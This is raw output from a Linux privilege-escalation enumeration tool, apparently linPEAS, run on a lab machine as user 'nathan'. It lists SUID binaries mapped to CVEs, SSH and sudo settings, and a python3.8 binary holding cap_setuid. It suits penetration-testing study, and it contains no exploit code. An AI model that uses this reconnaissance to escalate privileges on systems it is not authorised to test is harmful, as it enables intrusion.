tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Sorry, try again.
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
nathan:x:1001:1001::/home/nathan:/bin/bash
root:x:0:0:root:/root:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=112(ftp) gid=118(ftp) groups=118(ftp)
uid=113(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
╔══════════╣ Login now
05:08:27 up 2:52, 1 user, load average: 0.17, 0.07, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
root pts/0 Fri May 21 14:32:11 2021 - down (00:01) 10.10.14.7
root tty1 Fri May 21 14:31:21 2021 - down (00:02) 0.0.0.0
reboot system boot Fri May 21 14:30:50 2021 - Fri May 21 14:33:53 2021 (00:03) 0.0.0.0
root tty1 Fri May 21 13:43:26 2021 - down (00:47) 0.0.0.0
reboot system boot Fri May 21 13:40:52 2021 - Fri May 21 14:30:42 2021 (00:49) 0.0.0.0
root tty1 Sat May 15 21:41:23 2021 - down (00:01) 0.0.0.0
lab tty1 Sat May 15 21:40:56 2021 - Sat May 15 21:41:11 2021 (00:00) 0.0.0.0
reboot system boot Sat May 15 21:40:45 2021 - Sat May 15 21:42:37 2021 (00:01) 0.0.0.0
wtmp begins Sat May 15 21:40:29 2021
╔══════════╣ Last time logon each user
Username Port From Latest
root tty1 Fri Jul 23 13:29:13 +0000 2021
nathan pts/0 10.10.17.182 Tue Apr 7 04:53:04 +0000 2026
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
83 833k 83 696k 0 0 11208 0 0:01:16 0:01:03 0:00:13 11208 ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/snap/bin/lxc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii g++ 4:9.3.0-1ubuntu2 amd64 GNU C++ compiler
ii g++-9 9.3.0-17ubuntu1~20.04 amd64 GNU C++ compiler
ii gcc 4:9.3.0-1ubuntu2 amd64 GNU C compiler
ii gcc-9 9.3.0-17ubuntu1~20.04 amd64 GNU C compiler
/usr/bin/gcc
/usr/bin/g++
╔══════════╣ Searching mysql credentials and exec
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Oct 15 2019 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 May 23 2021 /etc/ldap
drwxr-xr-x 2 root root 32 May 7 2021 /snap/core18/2066/etc/ldap
drwxr-xr-x 2 root root 32 Jun 11 2021 /snap/core18/2074/etc/ldap
╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
-rw-r--r-- 1 root root 598 Sep 23 2020 /etc/ssh/ssh_host_dsa_key.pub
-rw-r--r-- 1 root root 170 Sep 23 2020 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 90 Sep 23 2020 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 562 Sep 23 2020 /etc/ssh/ssh_host_rsa_key.pub
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig_Root_R2.pem
6584PSTORAGE_CERTSBIN
══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 May 31 2021 /etc/pam.d
-rw-r--r-- 1 root root 2133 May 29 2020 /etc/pam.d/sshd
account required pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close
session required pam_loginuid.so
session optional pam_keyinit.so force revoke
session optional pam_motd.so motd=/run/motd.dynamic
session optional pam_motd.so noupdate
session optional pam_mail.so standard noenv # [1]
session required pam_limits.so
session required pam_env.so # [1]
session required pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so open
╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions
tmux 3.0a
/tmp/tmux-1001
╔══════════╣ Analyzing Cloud Init Files (limit 70)
-rw-r--r-- 1 root root 3559 Apr 19 2021 /snap/core18/2066/etc/cloud/cloud.cfg
lock_passwd: True
-rw-r--r-- 1 root root 3559 May 11 2021 /snap/core18/2074/etc/cloud/cloud.cfg
lock_passwd: True
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 200 May 7 2021 /snap/core18/2066/usr/share/keyrings
drwxr-xr-x 2 root root 200 Jun 11 2021 /snap/core18/2074/usr/share/keyrings
drwxr-xr-x 2 root root 4096 May 23 2021 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /snap/core18/2066/etc/pam.d/passwd
passwd file: /snap/core18/2066/etc/passwd
passwd file: /snap/core18/2066/usr/share/bash-completion/completions/passwd
passwd file: /snap/core18/2066/usr/share/lintian/overrides/passwd
passwd file: /snap/core18/2066/var/lib/extrausers/passwd
passwd file: /snap/core18/2074/etc/pam.d/passwd
passwd file: /snap/core18/2074/etc/passwd
passwd file: /snap/core18/2074/usr/share/bash-completion/completions/passwd
passwd file: /snap/core18/2074/usr/share/lintian/overrides/passwd
passwd file: /snap/core18/2074/var/lib/extrausers/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /snap/core18/2066/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /snap/core18/2066/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /snap/core18/2066/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /snap/core18/2066/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /snap/core18/2066/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /snap/core18/2074/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /snap/core18/2074/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /snap/core18/2074/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /snap/core18/2074/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /snap/core18/2074/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 3267 Jan 6 2021 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2274 May 11 2021 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 May 11 2021 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 May 11 2021 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 May 11 2021 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13 2020 /usr/share/popularity-contest/debian-popcon.gpg
╔══════════╣ Analyzing Cache Vi Files (limit 70)
lrwxrwxrwx 1 root root 9 May 27 2021 /home/nathan/.viminfo -> /dev/null
╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 675 Apr 2 2018 /snap/core18/2066/usr/share/bash-completion/completions/postfix
-rw-r--r-- 1 root root 675 Apr 2 2018 /snap/core18/2074/usr/share/bash-completion/completions/postfix
-rw-r--r-- 1 root root 813 Feb 2 2020 /usr/share/bash-completion/completions/postfix
╔══════════╣ Analyzing FTP Files (limit 70)
-rw-r--r-- 1 root root 5850 Mar 6 2019 /etc/vsftpd.conf
anonymous_enable
local_enable=YES
#write_enable=YES
#anon_upload_enable=YES
#anon_mkdir_write_enable=YES
#chown_uploads=YES
#chown_username=whoever
-rw-r--r-- 1 root root 41 Jun 18 2015 /usr/lib/tmpfiles.d/vsftpd.conf
-rw-r--r-- 1 root root 506 Mar 6 2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 564 Mar 6 2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE_NOINETD/vsftpd.conf
anonymous_enable
local_enable
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
-rw-r--r-- 1 root root 260 Feb 2 2008 /usr/share/doc/vsftpd/examples/VIRTUAL_USERS/vsftpd.conf
anonymous_enable
local_enable=YES
write_enable
anon_upload_enable
anon_mkdir_write_enable
anon_other_write_enable
╔══════════╣ Analyzing DNS Files (limit 70)
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25 2020 /etc/skel/.bashrc
-rw-r--r-- 1 nathan nathan 3771 Feb 25 2020 /home/nathan/.bashrc
-rw-r--r-- 1 root root 3771 Apr 4 2018 /snap/core18/2066/etc/skel/.bashrc
-rw-r--r-- 1 root root 3771 Apr 4 2018 /snap/core18/2074/etc/skel/.bashrc
-rw-r--r-- 1 root root 807 Feb 25 2020 /etc/skel/.profile
-rw-r--r-- 1 nathan nathan 807 Feb 25 2020 /home/nathan/.profile
-rw-r--r-- 1 root root 807 Apr 4 2018 /snap/core18/2066/etc/skel/.profile
-rw-r--r-- 1 root root 807 Apr 4 2018 /snap/core18/2074/etc/skel/.profile
100 833k 100 833k 0 0 13256 0 0:01:04 0:01:04 --:--:-- 10773
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 39K Jul 21 2020 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K May 28 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 31K Aug 16 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 55K Jul 21 2020 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 87K May 28 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 67K May 28 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 84K May 28 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 52K May 28 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 67K Jul 21 2020 /usr/bin/su
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 23K Aug 16 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 128K Feb 2 2021 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 463K Mar 9 2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 109K Apr 24 2021 /snap/snapd/11841/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 109K Jun 15 2021 /snap/snapd/12398/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/2066/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/2066/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2066/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/2066/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2066/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2066/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2066/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/2066/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/2066/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 19 2021 /snap/core18/2066/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11 2020 /snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/2066/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/2074/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/2074/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2074/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/2074/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2074/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/2074/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/2074/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/2074/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/2074/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 19 2021 /snap/core18/2074/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11 2020 /snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/2074/usr/lib/openssh/ssh-keysign
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 83K May 28 2020 /usr/bin/chage
-rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31K May 28 2020 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root ssh 343K Mar 9 2021 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 35K Jul 21 2020 /usr/bin/wall
-rwxr-sr-x 1 root utmp 15K Sep 30 2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 43K Apr 8 2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Apr 8 2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Jul 21 2020 /snap/core18/2066/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Jul 21 2020 /snap/core18/2066/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Mar 22 2019 /snap/core18/2066/usr/bin/chage
-rwxr-sr-x 1 root shadow 23K Mar 22 2019 /snap/core18/2066/usr/bin/expiry
-rwxr-sr-x 1 root crontab 355K Mar 4 2019 /snap/core18/2066/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 31K Sep 16 2020 /snap/core18/2066/usr/bin/wall
-rwxr-sr-x 1 root shadow 34K Apr 8 2021 /snap/core18/2074/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Apr 8 2021 /snap/core18/2074/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Mar 22 2019 /snap/core18/2074/usr/bin/chage
-rwxr-sr-x 1 root shadow 23K Mar 22 2019 /snap/core18/2074/usr/bin/expiry
-rwxr-sr-x 1 root crontab 355K Mar 4 2019 /snap/core18/2074/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 31K Sep 16 2020 /snap/core18/2074/usr/bin/wall
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf
- /usr/lib/x86_64-linux-gnu/libfakeroot
/etc/ld.so.conf.d/libc.conf
- /usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
- /usr/local/lib/x86_64-linux-gnu
- /lib/x86_64-linux-gnu
- /usr/lib/x86_64-linux-gnu
/etc/ld.so.preload
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb: 0x0000000000000000=
══╣ Parent process capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb: 0x0000000000000000=
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3222 Mar 11 2020 sbin.dhclient
-rw-r--r-- 1 root root 3202 Feb 25 2020 usr.bin.man
-rw-r--r-- 1 root root 26703 Feb 2 2021 usr.lib.snapd.snap-confine.real
-rw-r--r-- 1 root root 1575 Feb 11 2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root 1385 Dec 7 2019 usr.sbin.tcpdump
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 36
drwxr-xr-x 2 root root 4096 May 23 2021 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 96 Dec 5 2019 01-locale-fix.sh
-rw-r--r-- 1 root root 1557 Feb 17 2020 Z97-byobu.sh
-rw-r--r-- 1 root root 833 Feb 2 2021 apps-bin-path.sh
-rw-r--r-- 1 root root 729 Feb 2 2020 bash_completion.sh
-rw-r--r-- 1 root root 1003 Aug 13 2019 cedilla-portuguese.sh
-rw-r--r-- 1 root root 1107 Nov 3 2019 gawk.csh
-rw-r--r-- 1 root root 757 Nov 3 2019 gawk.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/nathan/.bash_history
/home/nathan/.viminfo
/root/
/var/www
/var/www/html/templates
/var/www/html/templates/index.html
/var/www/html/upload
/var/www/html/upload/0.pcap
/var/www/html/static
/var/www/html/static/js
/var/www/html/static/js/plugins.js
/var/www/html/static/js/scripts.js
/var/www/html/static/js/bar-chart.js
/var/www/html/static/js/metisMenu.min.js
/var/www/html/static/js/jquery.slimscroll.min.js
